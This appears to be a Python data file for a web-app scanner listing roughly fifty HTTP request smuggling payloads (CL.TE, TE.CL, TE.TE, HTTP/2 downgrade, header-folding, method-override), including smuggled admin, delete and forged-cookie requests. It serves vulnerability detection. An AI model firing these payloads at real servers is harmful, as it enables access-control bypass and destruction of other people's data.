"""http_smuggling_payloads — handcrafted dev-time. Webapp module asset.

Request-smuggling probe payloads (CL.TE, TE.CL, TE.TE variants). Used by
tools/webapp/http_smuggling.py to detect frontend/backend desync.

Each entry: {name, variant, payload, severity}.
Payload preserves literal \r\n for HTTP wire format.
"""

DESYNC_CRLF = "\r\n"

HTTP_SMUGGLING_PAYLOADS = [
    # ── CL.TE: frontend uses Content-Length, backend uses Transfer-Encoding ──
    {"name": "CL.TE basic", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nG",
     "severity": "CRITICAL"},
    {"name": "CL.TE with smuggled GET", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 35\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nX: x",
     "severity": "CRITICAL"},
    {"name": "CL.TE chunked-trailing-junk", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nx",
     "severity": "CRITICAL"},
    {"name": "CL.TE TE-with-space", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding : chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "CL.TE TE-with-tab", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding:\tchunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "CL.TE TE-newline-prefix", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\n Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "CL.TE double-TE", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: x\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "CL.TE TE-quoted", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: \"chunked\"\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "CL.TE TE-case-mismatch", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-encoding: CHUNKED\r\n\r\n0\r\n\r\nx",
     "severity": "MEDIUM"},
    {"name": "CL.TE TE-comma-list", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: identity, chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "CL.TE smuggled-cookie", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 45\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET / HTTP/1.1\r\nCookie: session=admin\r\n\r\n",
     "severity": "CRITICAL"},
    {"name": "CL.TE smuggled-POST", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 64\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST /admin/delete HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\n\r\nid=1",
     "severity": "CRITICAL"},
    {"name": "CL.TE prefix-trailing-junk", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 11\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGGGGGGGGGGG",
     "severity": "HIGH"},
    {"name": "CL.TE no-final-crlf", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "CL.TE multiple-CL", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nContent-Length: 7\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},

    # ── TE.CL: frontend uses TE, backend uses CL ────────────────────────────
    {"name": "TE.CL basic", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nGET /admin HTTP/1.1\r\nHost: target\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n",
     "severity": "CRITICAL"},
    {"name": "TE.CL smuggled-DELETE", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n39\r\nDELETE /api/users/1 HTTP/1.1\r\nHost: target\r\n\r\n0\r\n\r\n",
     "severity": "CRITICAL"},
    {"name": "TE.CL nested-chunked", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n3\r\nfoo\r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "TE.CL chunked-with-ext", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5;x=y\r\nGETx \r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "TE.CL malformed-chunksize", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n0x5\r\nGETxx\r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "TE.CL pipelined-smuggle", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n4c\r\nGET /admin/delete?u=1 HTTP/1.1\r\nHost: target\r\n\r\n0\r\n\r\nx",
     "severity": "CRITICAL"},
    {"name": "TE.CL with-junk-padding", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n3\r\nfoo\r\n0\r\n\r\nGET /x HTTP/1.1\r\n\r\n",
     "severity": "MEDIUM"},
    {"name": "TE.CL leading-trailer", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\nTrailer: X-Smuggle\r\n\r\n0\r\nX-Smuggle: yes\r\n\r\n",
     "severity": "MEDIUM"},
    {"name": "TE.CL crlf-injection-chunk", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5\r\nGET\r\n \r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "TE.CL te-as-cl-fallback", "variant": "te_cl",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: chunked\r\nContent-Length: 4\r\n\r\n0\r\n\r\n",
     "severity": "HIGH"},

    # ── TE.TE: header obfuscation tricks ────────────────────────────────────
    {"name": "TE.TE space-after-colon", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding:chunked\r\nTransfer-Encoding : chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "TE.TE TE-quoted-vs-bare", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: \"chunked\"\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "TE.TE TE-uppercase-LOWER", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: CHUNKED\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nx",
     "severity": "MEDIUM"},
    {"name": "TE.TE TE-tab-prefix", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\n\tTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "TE.TE TE-encoded", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: x\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "TE.TE TE-comma-empty", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: chunked,\r\nTransfer-Encoding: identity\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "TE.TE TE-bad-bytes", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: chunked\rTransfer-Encoding: identity\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "TE.TE TE-folding", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: \r\n chunked\r\n\r\n0\r\n\r\nx",
     "severity": "HIGH"},
    {"name": "TE.TE TE-vs-CL", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 0\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nGET /admin HTTP/1.1\r\n\r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "TE.TE TE-newline-injection", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: chunked\nX: x\r\n\r\n0\r\n\r\n",
     "severity": "MEDIUM"},

    # ── HTTP/2 downgrade smuggling ──────────────────────────────────────────
    {"name": "H2.CL downgrade", "variant": "h2_downgrade",
     "payload": "GET / HTTP/1.1\r\nHost: target\r\nContent-Length: 5\r\n\r\nGGGGG",
     "severity": "HIGH"},
    {"name": "H2.TE downgrade", "variant": "h2_downgrade",
     "payload": "GET / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "H2 :method smuggle", "variant": "h2_downgrade",
     "payload": "GET / HTTP/1.1\r\nHost: target\r\nX-Forwarded-Method: DELETE\r\n\r\n",
     "severity": "MEDIUM"},
    {"name": "H2 :authority smuggle", "variant": "h2_downgrade",
     "payload": "GET / HTTP/1.1\r\nHost: target\r\nX-Forwarded-Host: evil.example\r\n\r\n",
     "severity": "MEDIUM"},
    {"name": "H2 prior-knowledge upgrade", "variant": "h2_downgrade",
     "payload": "GET / HTTP/1.1\r\nHost: target\r\nUpgrade: h2c\r\nConnection: Upgrade, HTTP2-Settings\r\nHTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA\r\n\r\n",
     "severity": "MEDIUM"},

    # ── Header line-folding tricks ──────────────────────────────────────────
    {"name": "Line-fold TE header", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: chunked\r\n  identity\r\n\r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "Multiline header split", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nFoo: bar\r\n Baz: qux\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
     "severity": "MEDIUM"},
    {"name": "Header with CR-only delimiter", "variant": "te_te",
     "payload": "POST / HTTP/1.1\rHost: target\rTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
     "severity": "HIGH"},
    {"name": "Header with LF-only delimiter", "variant": "te_te",
     "payload": "POST / HTTP/1.1\nHost: target\nTransfer-Encoding: chunked\n\n0\n\n",
     "severity": "HIGH"},
    {"name": "Header with double-CRLF early termination", "variant": "te_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\n\r\nGET /smuggled HTTP/1.1\r\nHost: target\r\n\r\n",
     "severity": "HIGH"},

    # ── HTTP method smuggling ───────────────────────────────────────────────
    {"name": "X-Original-Method bypass", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nX-Original-Method: DELETE\r\nContent-Length: 0\r\n\r\n",
     "severity": "MEDIUM"},
    {"name": "X-HTTP-Method-Override", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nX-HTTP-Method-Override: DELETE\r\nContent-Length: 0\r\n\r\n",
     "severity": "MEDIUM"},
    {"name": "X-Method-Override", "variant": "cl_te",
     "payload": "POST / HTTP/1.1\r\nHost: target\r\nX-Method-Override: PUT\r\nContent-Length: 0\r\n\r\n",
     "severity": "MEDIUM"},
]
